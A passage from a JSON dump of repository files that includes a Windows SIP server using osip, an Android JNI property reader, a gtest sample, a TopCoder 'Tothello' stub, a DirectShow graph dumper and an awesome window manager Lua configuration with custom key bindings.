osip_strdup(sdp), strlen(sdp));\n\t}\n\telse\n\t{//decline call\n\t\tosip_message_set_status_code(response, SIP_DECLINE);\n\t\tosip_message_set_reason_phrase(response, osip_strdup(\"Decline\"));\n\t\tosip_message_set_contact(response, NULL);\n\t}\n\n\tevt = osip_new_outgoing_sipmessage(response);\n\tevt->transactionid = tran->transactionid;\n\tosip_transaction_add_event(tran, evt);\n\treturn NULL;\n}\n\nvoid cb_RcvISTReq(int, osip_transaction_t *tran, osip_message_t *msg)\n{\t\n\tosip_message_t *response = NULL;\t\n\tosip_event_t *evt = NULL;\n\n\tBuildResponse(msg, &response);//trying\n\tosip_message_set_status_code(response, SIP_TRYING);\n\tevt = osip_new_outgoing_sipmessage(response);\t\n\tosip_message_set_reason_phrase(response, osip_strdup(\"Trying\"));\n\tosip_transaction_add_event(tran, evt);\n\t\n\tBuildResponse(msg, &response);//dialog establishement\n\tosip_message_set_status_code(response, 101);\n\tevt = osip_new_outgoing_sipmessage(response);\t\n\tosip_message_set_reason_phrase(response, osip_strdup(\"Dialog Establishement\"));\n\tosip_transaction_add_event(tran, evt);\n\n\tBuildResponse(msg, &response);//ringing\n\tosip_message_set_status_code(response, SIP_RINGING);\n\tevt = osip_new_outgoing_sipmessage(response);\t\n\tosip_message_set_reason_phrase(response, osip_strdup(\"Ringing\"));\n\tosip_transaction_add_event(tran, 
evt);\n\n\tosip_thread_create(0, Notify, tran);// start another thread to notify user the incoming call\n}\n\nvoid SetCallbacks(osip_t *osip)\n{\n\tosip_set_cb_send_message(osip, cb_SendMsg);\n\tosip_set_message_callback(osip, OSIP_ICT_STATUS_1XX_RECEIVED, cb_RcvICTRes);\n\tosip_set_message_callback(osip, OSIP_NICT_STATUS_1XX_RECEIVED, cb_RcvNICTRes);\n\tosip_set_message_callback(osip, OSIP_IST_INVITE_RECEIVED, cb_RcvISTReq);\n\tosip_set_kill_transaction_callback(osip, OSIP_IST_KILL_TRANSACTION, cb_ISTTranKill);\n}\n\nSOCKET InitNet()\n{\n\tWSADATA wsaData;\n\tWSAStartup(MAKEWORD(2,2), &wsaData);\n\tSOCKET sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n\tTCHAR ip[] = TEXT(\"0.0.0.0:5060\");\n\tstruct sockaddr addr;\n\tint addrSize = sizeof(struct sockaddr);\n\tWSAStringToAddress(ip, AF_INET, NULL, &addr, &addrSize);\n\tbind(sock, &addr, addrSize);\n\treturn sock;\n}\n\nvoid ProcessNewReq(osip_t* osip, osip_event_t *evt)\n{\n\tosip_transaction_t *tran;\n\tosip_transaction_init(&tran, IST, osip, evt->sip);\n\t//osip_transaction_set_in_socket (tran, socket);\n\tosip_transaction_set_out_socket (tran, g_sock);\n\tosip_transaction_set_your_instance(tran, osip);// store osip in transaction for later usage\n\tosip_transaction_add_event(tran, evt);\n}\n\nvoid* TransportFun(void* arg)\n{\n\tint rc;\n\tosip_t* osip = static_cast<osip_t*>(arg);\n\t\t\n\tOutputDebugString(TEXT(\"initialize network\"));\n\tg_sock = InitNet();\t\n\tassert(0 < g_sock);\n\tchar buf[BUFFSIZE];\n\twhile(true)\n\t{\n\t\tstruct sockaddr from;\n\t\tint addrSize = sizeof(struct sockaddr);\n\t\tint len = recvfrom(g_sock, buf, BUFFSIZE, 0, &from, &addrSize);\n\t\tif(len < 1)\n\t\t\tcontinue;\n\t\tbuf[len] = 0;\n\t\tWCHAR addrBuf[1024];\n\t\tDWORD addrBufLen;\n\t\tWSAAddressToString(&from, addrSize, NULL, addrBuf, &addrBufLen);\n\t\t\n\t\tosip_event_t *evt = osip_parse(buf, len);\n\t\trc = osip_find_transaction_and_add_event(osip, evt);\n\t\tif(0 != rc)\n\t\t{\n\t\t\tOutputDebugString(TEXT(\"this event has no transaction, create a new one.\"));\n\t\t\tProcessNewReq(osip, evt);\n\t\t}\n\t}\n\treturn NULL;\n}\n\nint main(int argc, _TCHAR* argv[])\n{\n\tUNUSED(argc); UNUSED(argv);\n\tosip_t* osip = NULL;\n\tosip_init(&osip);\n\tSetCallbacks(osip);\n\tosip_thread_create(0, TransportFun, osip);\n\twhile(true)\n\t{\t\t\n\t\tosip_ict_execute(osip);\n\t\tosip_ist_execute(osip);\n\t\tosip_nict_execute(osip);\n\t\tosip_nist_execute(osip);\n\t\tosip_timers_ict_execute(osip);\n\t\tosip_timers_ist_execute(osip);\n\t\tosip_timers_nict_execute(osip);\n\t\tosip_timers_nist_execute(osip);\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.6332319974899292, "alphanum_fraction": 0.6514691114425659, "avg_line_length": 28.02941131591797, "blob_id": "45a28650acaea6a6a0476211c8f40ab935559f7b", "content_id": "91616bf70737b569efb8dd28c0bbf17a97bccc5f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 987, "license_type": "permissive", "max_line_length": 112, "num_lines": 34, "path": "/android/read_system_property_with_jni/jni/sys_property.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/**\n * Copyright (C) 2013 read_property\n *\n * @author Raymond Wen, [email protected]\n * @date 2013 Jul 21 15:00:58\n * \n */\n\n\n#include\t<jni.h>\n#include\t<android/log.h>\n#include\t<sys/system_properties.h>\n#include <stdlib.h>\n\n#define LOG_TAG \"libtupnp\"\n#define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)\n#define LOGE(...) 
__android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)\n\njstring Java_com_rmd_propertySample_MainActivity_getProperty(JNIEnv* env, jobject thiz, jstring property_name) {\n char value[PROP_VALUE_MAX];\n /*const char* name = \"net.dns1\";*/\n const char* name = (*env)->GetStringUTFChars(env, property_name, NULL);\n\n __system_property_get(name, value);\n LOGI(\"__system_property_get: %s: %s\", name, value);\n return (*env)->NewStringUTF(env, value);\n /*return 0;*/\n}\n\nvoid Java_com_rmd_propertySample_MainActivity_setProperty(JNIEnv* env, \n jobject thiz, \n jstring property_name,\n jstring property_value) {\n}\n" }, { "alpha_fraction": 0.6272727251052856, "alphanum_fraction": 0.6454545259475708, "avg_line_length": 17.909090042114258, "blob_id": "7df390bc288428b3903e3cf0e689e88a3a11db99", "content_id": "dff5593221dabab92b1c2724caba364fda77b61d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 440, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/wince/ce_gtest_proj/ce_gtest_proj.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// ce_gtest_proj.cpp : Defines the entry point for the console application.\r\n//\r\n\r\n#include \"stdafx.h\"\r\n#include \"gtest/gtest.h\"\r\n#pragma comment(linker, \"/nodefaultlib:secchk.lib\")\r\nint add(int a, int b)\r\n{\r\n\treturn a+b;\r\n}\r\n\r\nTEST(AddTest, TestNonNegativeNumber)\r\n{\r\n\tEXPECT_EQ(1, add(1,0));\r\n\tEXPECT_EQ(42, add(1,41));\r\n}\r\n\r\nint _tmain(int argc, _TCHAR* argv[])\r\n{\r\n\ttesting::InitGoogleTest(&argc, argv);\r\n\treturn RUN_ALL_TESTS();\r\n}\r\n\r\n" }, { "alpha_fraction": 0.5405552983283997, "alphanum_fraction": 0.5547804832458496, "avg_line_length": 39.84357452392578, "blob_id": "b29cbf2cb56d7201d70356c71a1816277eafee5d", "content_id": "c23af1c43296d235ddbfbd91c80090235f445c26", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7319, "license_type": "permissive", "max_line_length": 92, "num_lines": 179, "path": "/algorithm/topcoder/practice_room/inv_2001_a+b/500.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: 500.cpp\n// \n// Description: problem Statement\n//     \n// THIS PROBLEM WAS TAKEN FROM THE SEMIFINALS OF THE TOPCODER INVITATIONAL\n// TOURNAMENT\n//\n// Class Name: Tothello\n// Method Name: bestMove\n// Parameters: String[], String[], String\n// Returns: int\n// Method signature (be sure your method is public): int bestMove(String[]\n// redPieces, String[] blackPieces, String whoseTurn);\n//\n//\n// PROBLEM STATEMENT\n// The game Tothello is a TopCoder modified version of the board game Othello.\n// The game is played on an 8 x 8 grid with two players, Black and Red. The\n// players alternate turns placing one piece representing their color in one empty\n// square of the grid. When the Red player puts a red piece down, any black\n// pieces that end up between the piece that was placed on the board and any other\n// red piece already on the board should be changed to red. If the change in\n// color from black to red of any piece on the board causes other black pieces to\n// lie between two red pieces, those black pieces should also be changed to red.\n// The changing of black pieces will continue until no one black piece lies\n// between two red pieces. 
The manner that pieces change color apply when the\n// Black player places a piece on the grid, however, the pieces would then change\n// from red to black. A player also has the option of passing - not putting any\n// pieces down - on his turn, in which case the other player just gets to go twice\n// in a row.\n//\n// You are to write a program that helps a player determine their best possible\n// move - the move that results in the most pieces being that player's color at\n// the end of the move. \n//\n// Implement a class Tothello that contains a method bestMove. bestMove inputs\n// the current state of the grid before a specified player's move and outputs the\n// number of the player's pieces on the board as a result of the player's best\n// move. \n//\n// NOTES\n// - redPieces is a String[] representing the current positions of red pieces on\n// the board. \n// - blackPieces is a String[] representing the current positions of black pieces\n// on the board. \n// - The board is an 8x8 grid with the columns referred to by the uppercase\n// letters A-H and the rows referred to by the numbers 1-8 (inclusive). The\n// column is specified before the row. A1 is in the upper left. H8 is in the\n// lower right. \n// - redPieces and blackPieces are not necessarily the same length (players may\n// have passed on moves).\n// - A black piece is between two red pieces if a red piece can be found before an\n// empty square on either side by following the horizontal, vertical, or either\n// diagonal out from the Black piece. For example:\n//\n// - - - R - - - -\n// - - - B - - - -\n// - - - B - - - - All three Black pieces are between two red pieces.\n// - - - B - - - -\n// - - - R - - - -\n//\n//\n// - - - R - - - -\n// - - - B B - - -\n// - - - B - B - - All four Black pieces are between two Red pieces.\n// - - - R R R R R\n//\n//\n// - - - R - - - -\n// - - - B R - - -\n// - - - - - - - - The Black piece is not between two Red pieces.\n// - - - R R - - -\n//\n//\n// R R R R R R R R\n// R - - - - - - R\n// R - B B - B - R\n// R - B B B B - R None of the Black pieces are between two Red pieces.\n// R - - - - - - R\n// R R R R R R R R\n//\n// TopCoder will ensure the validity of the inputs. Inputs are valid if all of\n// the following criteria are met:\n// - Both redPieces and blackPieces contain between 0 and 50 elements (inclusive).\n// - All elements of redPieces and blackPieces consist of uppercase letters A-H\n// and numbers 1-8 (inclusive).\n// - All elements of redPieces and blackPieces are in the form of letter-number\n// pairs with each letter representing the column and each number representing the\n// row of the piece's position (i.e. \"A2\" where 'A' is the column and '2' is the\n// row of the piece's position).\n// - whoseTurn is a String that is equal to either \"Red\" or \"Black\" representing\n// the player for which the method is being run.\n// - The current state of the board represented by redPieces and blackPieces\n// contains no red pieces between any black pieces and no black pieces between any\n// red pieces (a state where there were black pieces between red pieces is\n// impossible at the start of a move, assuming the game has been played\n// correctly.) 
\n// - The elements are unique in redPieces and blackPieces, and redPieces and\n// blackPieces do not contain any of the same elements.\n// - The game board must start with at least one unoccupied space.\n//\n// EXAMPLES\n// If redPieces=[C2,C3,C4,C5,D4,E4,F2,F3,F4,F5,G6] and\n// blackPieces=[B1,E1,G1,C6,H7,G4] and whoseTurn=\"Black\", \n// Before the player's move, the board is:\n//\n// A B C D E F G H\n// 1 - B - - B - B -\n// 2 - - R - - R - -\n// 3 - - R - - R - -\n// 4 - - R R R R B - \n// 5 - - R - - R - -\n// 6 - - B - - - R - \n// 7 - - - - - - - B\n// 8 - - - - - - - -\n//\n// Black's best move is C1, which results in:\n//\n// A B C D E F G H A B C D E F G H A B C D E F G H A B C D E F G H\n// 1 - B - - B - B - 1 - B B - B - B - 1 - B B - B - B - 1 - B B - B - B - \n// 2 - - R - - R - - 2 - - B - - R - - 2 - - B - - R - - 2 - - B - - R - -\n// 3 - - R - - R - - 3 - - B - - R - - 3 - - B - - R - - 3 - - B - - R - -\n// 4 - - R R R R B - --> 4 - - B R R R B - --> 4 - - B B B B B - --> 4 - - B B B B B -\n// 5 - - R - - R - - 5 - - B - - R - - 5 - - B - - R - - 5 - - B - - B - -\n// 6 - - B - - - R - 6 - - B - - - R - 6 - - B - - - R - 6 - - B - - - B -\n// 7 - - - - - - - B 7 - - - - - - - B 7 - - - - - - - B 7 - - - - - - - B\n// 8 - - - - - - - - 8 - - - - - - - - 8 - - - - - - - - 8 - - - - - - - -\n//\n// There end up being 16 black pieces, so the method should return 16.\n//\n// If redPieces=[A1,B8,C6,C8,D8] and blackPieces=[B2,C2,C3,C4,C5] and\n// whoseTurn=\"Red\", Red's best move is C1, and the method should return 11.\n//\n//\n//\n// Definition\n//     \n// Class:\n// Tothello\n// Method:\n// bestMove\n// Parameters:\n// vector <string>, vector <string>, string\n// Returns:\n// int\n// Method signature:\n// int bestMove(vector <string> param0, vector <string> param1, string param2)\n// (be sure your method is public)\n// \n// \n// =====================================================================================\n\n\n#include\t<string>\n#include\t<vector>\n\nusing std::string;\nusing std::vector;\n\nclass Tothello\n{\npublic:\n int bestMove(vector <string> param0, vector <string> param1, string param2);\nprivate:\n// int \n};\n\nint Tothello::bestMove(vector <string> param0, vector <string> param1, string param2)\n{\n return 0;\n}\n\n\nint main ( int argc, char *argv[] )\n{\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.7116564512252808, "alphanum_fraction": 0.7300613522529602, "avg_line_length": 30.200000762939453, "blob_id": "c62405c9c3faadfb0a8098d1c6d462d744b08a40", "content_id": "7dce8c81f108a858e789a4334adf61754373cb15", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 163, "license_type": "permissive", "max_line_length": 43, "num_lines": 5, "path": "/algorithm/i2a_ex_9.3-8/makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "EXENAME = ex9_3_8 \r\n#UNITTESTEXENAME = entry_source_name\r\n#SRCEXTENSION = cpp \r\n#EXTERNALLIBS += additional_libs_to_include\r\ninclude\t$(MAKEFILE_ROOT)\\common.mk\r\n\r\n" }, { "alpha_fraction": 0.7489177584648132, "alphanum_fraction": 0.7878788113594055, "avg_line_length": 45.20000076293945, "blob_id": "8141018a6f293940a32df375bbbf5dfa83f93917", "content_id": "c8f69461e2e9d437e58b5459c4d29070ba5de121", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 231, "license_type": "permissive", "max_line_length": 59, "num_lines": 
5, "path": "/settings/go_tools.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "1. install vim-go plugin\n2. install go utils with GoInstallBinaries\n3. install glide with: go get github.com/Masterminds/glide\n 3.1. set GO15VENDOREXPRIMENT=1 to enable vendor support\n4. # install delve, alternative for godebug\n" }, { "alpha_fraction": 0.603985071182251, "alphanum_fraction": 0.6158156991004944, "avg_line_length": 23.09375, "blob_id": "28ed42505b289bceca9022456a2b4fafb979938d", "content_id": "4bfa6cd987cd582308ae07b313bb1c6a1697f8b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1606, "license_type": "permissive", "max_line_length": 67, "num_lines": 64, "path": "/multimedia/directshow/graphdump.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#include <dshow.h>\r\n\r\nvoid DumpGraph(const IGraphBuilder *pGraph)\r\n{\r\n\tusing std::cout;\r\n\tusing std::endl;\r\n\tIBaseFilter *pFlt = NULL;\r\n\tIEnumFilters *pEnumFlt = NULL;\r\n\tFILTER_INFO fltInfo;\r\n\r\n\tIEnumPins *pEnumPin = NULL;\r\n\tIPin *pPin = NULL;\r\n\tPIN_INFO pinInfo;\r\n\tHRESULT hr, hr2;\r\n\tTCHAR ptr[32] = {0};\r\n\thr = const_cast<IGraphBuilder*>(pGraph)->EnumFilters(&pEnumFlt);\r\n\tif(FAILED(hr))\r\n\t\treturn;\r\n\tdo\r\n\t{\r\n\t\thr = pEnumFlt->Next(1, &pFlt, NULL);\r\n\t\tif(S_OK != hr || NULL == pFlt)\r\n\t\t\tbreak;\r\n\r\n\t\tpFlt->QueryFilterInfo(&fltInfo);\r\n\t\tOutputDebugString(TEXT(\"\\t\"));\r\n\t\twsprintf(ptr, TEXT(\"0x%08X \"), pFlt);\r\n\t\tOutputDebugString(ptr);\r\n\t\tOutputDebugString(fltInfo.achName);\r\n\t\tOutputDebugString(TEXT(\"\\n\"));\r\n\t\tcout << fltInfo.achName << endl;\r\n\t\t\r\n\t\thr2 = pFlt->EnumPins(&pEnumPin);\r\n\t\tdo\r\n\t\t{\r\n\t\t\thr2 = pEnumPin->Next(1, &pPin, NULL);\r\n\t\t\tif(S_OK != hr2 || NULL == pPin)\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tpPin->QueryPinInfo(&pinInfo);\r\n\t\t\tOutputDebugString(TEXT(\"\\t\\t\"));\r\n\t\t\twsprintf(ptr, TEXT(\"0x%08X \"), pPin);\r\n\t\t\tOutputDebugString(ptr);\r\n\t\t\tif(PINDIR_INPUT == pinInfo.dir)\r\n\t\t\t\tOutputDebugString(TEXT(\"[In ]\\t\"));\r\n\t\t\telse\r\n\t\t\t\tOutputDebugString(TEXT(\"[Out]\\t\"));\r\n\t\t\tOutputDebugString(pinInfo.achName);\r\n\t\t\tIPin *pConnected = NULL;\r\n\t\t\tif(S_OK == pPin->ConnectedTo(&pConnected) && NULL != pConnected)\r\n\t\t\t\twsprintf(ptr, TEXT(\"\\t\\tConnected to:0x%08X\\n\"), pConnected);\r\n\t\t\telse\r\n\t\t\t\twsprintf(ptr, TEXT(\"\\t\\tNot Connected\\n\"));\r\n\t\t\tOutputDebugString(ptr);\r\n\r\n\t\t\tpPin->Release();\r\n\t\t} while(S_OK == hr2);\r\n\t\tpEnumPin->Release();\r\n\r\n\t\tpFlt->Release();\r\n\t\tpFlt = NULL;\r\n\t} while(S_OK == hr);\r\n\tpEnumFlt->Release();\r\n}\r\n" }, { "alpha_fraction": 0.5026484727859497, "alphanum_fraction": 0.5099433064460754, "avg_line_length": 39.83871078491211, "blob_id": "c3bbcda90934edd0f09955e3ba31c1034c80db4c", "content_id": "1d994566584bb3123106917ff4c0315ac51bf458", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 21532, "license_type": "permissive", "max_line_length": 165, "num_lines": 527, "path": "/settings/ubuntu_home/awesome/rc.lua", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "-- Standard awesome library\nrequire(\"awful\")\nrequire(\"awful.autofocus\")\nrequire(\"awful.rules\")\n-- Theme handling library\nrequire(\"beautiful\")\n-- Notification library\nrequire(\"naughty\")\n\n-- Load Debian menu 
entries\nrequire(\"debian.menu\")\n\n-- {{{ Error handling\n-- Check if awesome encountered an error during startup and fell back to\n-- another config (This code will only ever execute for the fallback config)\nif awesome.startup_errors then\n naughty.notify({ preset = naughty.config.presets.critical,\n title = \"Oops, there were errors during startup!\",\n text = awesome.startup_errors })\nend\n\n-- Handle runtime errors after startup\ndo\n local in_error = false\n awesome.add_signal(\"debug::error\", function (err)\n -- Make sure we don't go into an endless error loop\n if in_error then return end\n in_error = true\n\n naughty.notify({ preset = naughty.config.presets.critical,\n title = \"Oops, an error happened!\",\n text = err })\n in_error = false\n end)\nend\n-- }}}\n\n-- {{{ Variable definitions\n-- Themes define colours, icons, and wallpapers\nbeautiful.init(\"/usr/share/awesome/themes/zenburn/theme.lua\")\n\n-- This is used later as the default terminal and editor to run.\nterminal = \"x-terminal-emulator\"\neditor = os.getenv(\"EDITOR\") or \"editor\"\neditor_cmd = terminal .. \" -e \" .. editor\n\n-- Default modkey.\n-- Usually, Mod4 is the key with a logo between Control and Alt.\n-- If you do not like this or do not have such a key,\n-- I suggest you to remap Mod4 to another key using xmodmap or other tools.\n-- However, you can use another modifier like Mod1, but it may interact with others.\nmodkey = \"Mod4\"\n\n-- Table of layouts to cover with awful.layout.inc, order matters.\nlayouts =\n{\n awful.layout.suit.tile,\n awful.layout.suit.tile.left,\n awful.layout.suit.tile.bottom,\n awful.layout.suit.tile.top,\n awful.layout.suit.fair,\n awful.layout.suit.fair.horizontal,\n awful.layout.suit.spiral,\n awful.layout.suit.spiral.dwindle,\n awful.layout.suit.max,\n awful.layout.suit.max.fullscreen,\n awful.layout.suit.floating,\n awful.layout.suit.magnifier\n}\n-- }}}\n\n-- {{{ Tags\n-- Define a tag table which hold all screen tags.\ntags = {}\nfor s = 1, screen.count() do\n -- Each screen has its own tag table.\n tags[s] = awful.tag({ 1, 2, 3, 4, 5, 6, 7, 8, 9 }, s, layouts[1])\nend\n-- }}}\n\n-- {{{ Menu\n-- Create a laucher widget and a main menu\nmyawesomemenu = {\n { \"manual\", terminal .. \" -e man awesome\" },\n { \"edit config\", editor_cmd .. \" \" .. 
awesome.conffile },\n { \"restart\", awesome.restart },\n { \"quit\", awesome.quit }\n}\n\nmymainmenu = awful.menu({ items = { { \"awesome\", myawesomemenu, beautiful.awesome_icon },\n { \"Debian\", debian.menu.Debian_menu.Debian },\n { \"open terminal\", terminal }\n }\n })\n\nmylauncher = awful.widget.launcher({ image = image(beautiful.awesome_icon),\n menu = mymainmenu })\n-- }}}\n\n-- {{{ Wibox\n-- Create a textclock widget\nmytextclock = awful.widget.textclock({ align = \"right\" })\nbatterywidget = widget({type=\"textbox\", name=\"batterywidget\", align=\"right\"})\n-- Create a systray\nmysystray = widget({ type = \"systray\" })\n\n-- Create a wibox for each screen and add it\nmywibox = {}\nmypromptbox = {}\nmylayoutbox = {}\nmytaglist = {}\nmytaglist.buttons = awful.util.table.join(\n awful.button({ }, 1, awful.tag.viewonly),\n awful.button({ modkey }, 1, awful.client.movetotag),\n awful.button({ }, 3, awful.tag.viewtoggle),\n awful.button({ modkey }, 3, awful.client.toggletag),\n awful.button({ }, 4, awful.tag.viewnext),\n awful.button({ }, 5, awful.tag.viewprev)\n )\nmytasklist = {}\nmytasklist.buttons = awful.util.table.join(\n awful.button({ }, 1, function (c)\n if c == client.focus then\n c.minimized = true\n else\n if not c:isvisible() then\n awful.tag.viewonly(c:tags()[1])\n end\n -- This will also un-minimize\n -- the client, if needed\n client.focus = c\n c:raise()\n end\n end),\n awful.button({ }, 3, function ()\n if instance then\n instance:hide()\n instance = nil\n else\n instance = awful.menu.clients({ width=250 })\n end\n end),\n awful.button({ }, 4, function ()\n awful.client.focus.byidx(1)\n if client.focus then client.focus:raise() end\n end),\n awful.button({ }, 5, function ()\n awful.client.focus.byidx(-1)\n if client.focus then client.focus:raise() end\n end))\n\nfor s = 1, screen.count() do\n -- Create a promptbox for each screen\n mypromptbox[s] = awful.widget.prompt({ layout = awful.widget.layout.horizontal.leftright })\n -- Create an imagebox widget which will contains an icon indicating which layout we're using.\n -- We need one layoutbox per screen.\n mylayoutbox[s] = awful.widget.layoutbox(s)\n mylayoutbox[s]:buttons(awful.util.table.join(\n awful.button({ }, 1, function () awful.layout.inc(layouts, 1) end),\n awful.button({ }, 3, function () awful.layout.inc(layouts, -1) end),\n awful.button({ }, 4, function () awful.layout.inc(layouts, 1) end),\n awful.button({ }, 5, function () awful.layout.inc(layouts, -1) end)))\n -- Create a taglist widget\n mytaglist[s] = awful.widget.taglist(s, awful.widget.taglist.label.all, mytaglist.buttons)\n\n -- Create a tasklist widget\n mytasklist[s] = awful.widget.tasklist(function(c)\n return awful.widget.tasklist.label.currenttags(c, s)\n end, mytasklist.buttons)\n\n -- Create the wibox\n mywibox[s] = awful.wibox({ position = \"top\", screen = s })\n -- Add widgets to the wibox - order matters\n mywibox[s].widgets = {\n {\n mylauncher,\n mytaglist[s],\n mypromptbox[s],\n layout = awful.widget.layout.horizontal.leftright\n },\n mylayoutbox[s],\n batterywidget,\n mytextclock,\n s == 1 and mysystray or nil,\n mytasklist[s],\n layout = awful.widget.layout.horizontal.rightleft\n }\nend\n-- }}}\n\n-- {{{ Mouse bindings\nroot.buttons(awful.util.table.join(\n awful.button({ }, 3, function () mymainmenu:toggle() end),\n awful.button({ }, 4, awful.tag.viewnext),\n awful.button({ }, 5, awful.tag.viewprev)\n))\n-- }}}\n\n-- {{{ Key bindings\nglobalkeys = awful.util.table.join(\n awful.key({ modkey, }, \"Left\", awful.tag.viewprev 
),\n awful.key({ modkey, }, \"Right\", awful.tag.viewnext ),\n awful.key({ modkey, }, \"Escape\", awful.tag.history.restore),\n\n awful.key({ modkey, }, \"j\",\n function ()\n awful.client.focus.byidx( 1)\n if client.focus then client.focus:raise() end\n end),\n awful.key({ modkey, }, \"k\",\n function ()\n awful.client.focus.byidx(-1)\n if client.focus then client.focus:raise() end\n end),\n awful.key({ modkey, }, \"w\", function () mymainmenu:show({keygrabber=true}) end),\n\n -- Layout manipulation\n awful.key({ modkey, \"Shift\" }, \"j\", function () awful.client.swap.byidx( 1) end),\n awful.key({ modkey, \"Shift\" }, \"k\", function () awful.client.swap.byidx( -1) end),\n awful.key({ modkey, \"Control\" }, \"j\", function () awful.screen.focus_relative( 1) end),\n awful.key({ modkey, \"Control\" }, \"k\", function () awful.screen.focus_relative(-1) end),\n awful.key({ modkey, }, \"u\", awful.client.urgent.jumpto),\n awful.key({ modkey, }, \"Tab\",\n function ()\n awful.client.focus.history.previous()\n if client.focus then\n client.focus:raise()\n end\n end),\n\n -- Standard program\n awful.key({ modkey, }, \"Return\", function () awful.util.spawn(terminal) end),\n awful.key({ modkey, \"Control\" }, \"r\", awesome.restart),\n awful.key({ modkey, \"Shift\" }, \"q\", awesome.quit),\n\n awful.key({ modkey, }, \"l\", function () awful.tag.incmwfact( 0.05) end),\n awful.key({ modkey, }, \"h\", function () awful.tag.incmwfact(-0.05) end),\n awful.key({ modkey, \"Shift\" }, \"h\", function () awful.tag.incnmaster( 1) end),\n awful.key({ modkey, \"Shift\" }, \"l\", function () awful.tag.incnmaster(-1) end),\n awful.key({ modkey, \"Control\" }, \"h\", function () awful.tag.incncol( 1) end),\n awful.key({ modkey, \"Control\" }, \"l\", function () awful.tag.incncol(-1) end),\n awful.key({ modkey, }, \"space\", function () awful.layout.inc(layouts, 1) end),\n awful.key({ modkey, \"Shift\" }, \"space\", function () awful.layout.inc(layouts, -1) end),\n\n awful.key({ modkey, \"Control\" }, \"n\", awful.client.restore),\n\n -- Prompt\n -- awful.key({ modkey }, \"r\", function () mypromptbox[mouse.screen]:run() end),\n\n awful.key({ modkey }, \"x\",\n function ()\n awful.prompt.run({ prompt = \"Run Lua code: \" },\n mypromptbox[mouse.screen].widget,\n awful.util.eval, nil,\n awful.util.getdir(\"cache\") .. 
\"/history_eval\")\n end),\n\n -- my own key bindings\n awful.key({ \"Mod1\", \"Control\" }, \"l\", function () awful.util.spawn('gnome-screensaver-command -l') end),\n -- use alt+tab to switch to last focus client\n awful.key({ \"Mod1\", }, \"Tab\",\n function ()\n if nil == previous_client then\n else\n c = previous_client\n --debug_message(# c:geometry())\n if not c.focusable then\n return\n end\n if pcall(c.tags, c) then -- use pcall to test if c:tags can be called\n t = c:tags()[# c:tags()] -- # operator gets the number of tags table, refer to http://lua-users.org/wiki/TablesTutorial\n awful.tag.viewonly(t)\n c:raise()\n c.minimized = false\n awful.client.focus.byidx(0, c)\n if current_screen == nil or current_screen ~= c.screen then\n awful.screen.focus(c.screen)\n current_screen = c.screen\n end\n else\n previous_client = nil\n end\n end\n end),\n\n -- use ctrl+alt+c to run a caculator\n awful.key({ \"Mod1\", \"Control\" }, \"c\",\n function () \n awful.prompt.run({ prompt = \"<span color='yellow'><b> Calc: </b></span>\" }, mypromptbox[mouse.screen].widget,\n function (expr)\n local result = awful.util.pread(\"python -c 'from __future__ import division; from math import *; print \"..expr..\"'\")\n --naughty.notify({ text = result, timeout = 10 })\n naughty.notify({ title= expr..\"=\",\n text=result, \n position=\"top_left\", \n font=\"Sans 16\",\n border_color=\"black\", \n bg='#82B440', \n timeout=6,\n --hover_timeout=8,\n --run = function() io.popen(\"echo -n \"..result..\" | xclip -i\") end,\n })\n end)\n end),\n -- use Win+alt+r to run a program as root\n awful.key({ modkey, \"Mod1\" }, \"r\", \n function () \n path = os.getenv(\"PATH\"):gsub(':', ' ')\n cmd = awful.util.pread(\"stest -xelf \"..path..\" | dmenu \"\n ..\"-i -nf '#aaaaaa' -nb '#cc3244' -sf '#ffffff' -sb '#285577' -p 'run as root'\")\n if cmd and string.len(cmd)>0 then\n awful.util.spawn(\"gksu \"..cmd)\n end\n end),\n awful.key({ modkey }, \"r\", function () awful.util.spawn(\"dmenu_run \"\n ..\"-i -nf '#888888' -nb '#222222' -sf '#ffffff' -sb '#285577'\") end),\n awful.key({ \"Mod1\", \"Control\" }, \"s\",\n function ()\n local all_window = \"\\\"\"\n for k, c in pairs(client.get()) do\n if c.name then\n all_window = all_window .. \n string.gsub(c.name, '[\"]', '\\\\%1') .. \"\\n\" end\n end\n local lines = # client.get()\n local max_dmenu_lines = 18\n\n if lines > max_dmenu_lines then\n lines = max_dmenu_lines\n end\n all_window = all_window .. \"\\\"\"\n local f_reader = io.popen( \"printf \"..all_window..\"| dmenu -l \"..lines..\" -i -nb '\".. beautiful.bg_normal ..\"' -nf '\".. beautiful.fg_normal ..\"' -sb '#955'\")\n -- local f_reader = io.popen( \"lsw | dmenu -i -nb '\".. beautiful.bg_normal ..\"' -nf '\".. 
